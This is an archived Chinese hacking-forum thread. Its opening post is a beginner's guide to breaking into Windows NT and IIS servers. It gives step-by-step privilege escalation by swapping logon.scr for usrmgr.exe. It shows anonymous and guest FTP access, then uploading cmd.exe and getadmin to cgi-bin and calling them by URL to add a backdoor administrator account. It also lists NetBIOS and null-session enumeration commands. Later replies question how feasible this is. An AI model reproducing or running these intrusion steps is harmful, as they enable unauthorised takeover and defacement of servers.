20CN网络安全小组第一代论坛: 匿名用户入侵NT获得Admin权限

这是在 20CN网络安全小组第一代论坛 的论坛 软件使用 中的主题 匿名用户入侵NT获得Admin权限。

要查看这个主题，请使用这个 URL:
http://www.20cn.net/cgi-bin/ubb/ultimatebb.cgi?ubb=get_topic;f=7;t=000271

由 百花仙女 (编号: 1894) 发表于 :

如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号:

先把c:winntsystem32下的logon.scr改名为logon.old备份

然后把usrmgr.exe改名为logon.scr

然后重新启动

logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界
面,而是用户管理器

这时他就有权限把自己加到Administrator组

不要忘记把文件名改回来啊!

之二:

下面的技术适用于不重视NT网络安全的网站,虽然要靠运气,但是人多力量大

一些 http的技术也可以供较高级的人员参考

作为初学者,进入NT网络可以采取下面的步骤:

因为NT的IIS server的ftp一般都是允许anonymous匿名帐号进入的,有些anonymous
的帐号还有upload权限,我们就要攻击这类站点。因为如果不允许匿名帐号,就可能
造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较
高级的技术。

正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用
ftp登陆一个NT server,比如:www.xxx.com(示例名):

ftp www.xxx.com

Connected to www.xxx.com

220 ntsvr2 Microsoft FTP Service (Version 3.0).

ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSER_ntsvr2
的用户帐号,属于Domain user组，这个帐号我们以后要用来获取Administrator的权限

User (www.xxx.com none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 输入 guest@ 或者guest
对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。
那么guest帐号就是一个可用的正确的用户帐号，虽然只属于Domain guest组

在这种情况下我们就可以进NT server的ftp了。

进去以后,试试 cd /c ,如果运气好,改变目录成功，这时你就有了80%的把握。

现在,开始查找cgi-bin目录(或者scripts目录),进去以后,

把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin

然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN

大约十多秒后屏幕显示:

CGI Error

这时有90%的可能是:你已经把IUSER_ntsvr2升级为Administrator,也就是任何访问该web
站的人都是管理员

下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:winntsystem32net.exe%20user%20
china%20news%20/add

这样就创建了一个叫china用户,密码是news,然后:
http://www.xxx.com/cgi-bin/getadmin.exe?cnn
你再用cnn的帐号登陆,就可以改web根目录的主页了,也可以用上面的cmd.exe的方法直
接修改

之三:

用NT的Netbios技术扫描

nbtstat -a www.xxx.com

或者

nbtstat -A www.xxx.com

这样可以得到其域的共享资源名称

net view \www.xxx.com

可以获得其机器的共享资源名称,如果有c盘

net use f: \www.xxx.com\c$

可以用f:映射其c盘

net use \111.111.111.111\ipc$ "" /user:""

之四: Unix下移植过来的工具:

Windows95&98的用户可以用这个tcp/ip工具去抓tcp/ip连接中的包:

WinDump95.exe 使用前还要下载这个库 Packet95.exe

WindowsNT用户的版本

WinDump.exe　PacketNT.exe

由没影 (编号: 14) 发表于 :

很详细，连我这个菜鸟都快看明白了！！！继续继续！！！

由 NetDemon (编号: 3) 发表于 :

quote:
如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号:
先把c:winntsystem32下的logon.scr改名为logon.old备份
然后把usrmgr.exe改名为logon.scr
然后重新启动
logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界
面,而是用户管理器
这时他就有权限把自己加到Administrator组
不要忘记把文件名改回来啊!

普通用户帐号居然可以改动winnt\system32\下面的文件？？？？？

由 阿坤 (编号: 2624) 发表于 :

以上的技术存在很大的偶然性，可以说占到90%以上。关于FTP的默认帐号取得ADMIN的权限，在现在几乎不可能了。首先提供默认帐号的机器几乎绝迹了，再有登录权限小的不能再小，几乎不可能更改目录。唯一有机可乘之机的就是C GI—BIN和scripts目录执行权限用户可能包含有ereyone，所以现在的NT入侵除了漏洞和溢出就是想方设法将自己的文件上传到这个目录。关于共享入侵全平运气了。

由 TomyChen (编号: 16) 发表于 :

我觉得文件标题应改为：
普通用户提升为admin。
1.如：NetDemon所说。
2.如果以ftp（匿名用户）登陆FTP，的话，有可写权的几乎等于0（因为系统默认只可读）我想不出哪个管理员会把他设为可写，即使为了方便，匿名用户能 cd /c 且在cgi-bin目录可写？

或许是我见识少吧，文章对于匿名用户的可行性太低了。所以我觉得应该是以普通用户。
当然，我没有贬低作者的意思，只是个人意见

由 ghwll (编号: 5) 发表于 :

让匿名FTP溢出不就完了吗！真是的，程序在大鹰的主页上有。

由 TomyChen (编号: 16) 发表于 :

quote:
发贴人： ghwll:
让匿名FTP溢出不就完了吗！真是的，程序在大鹰的主页上有。

Mircosoft 的FTP有溢出漏洞？怎么没听说过？
大鹰那个是wu-ftp的吧？

由 duck-dong (编号: 3479) 发表于 :

good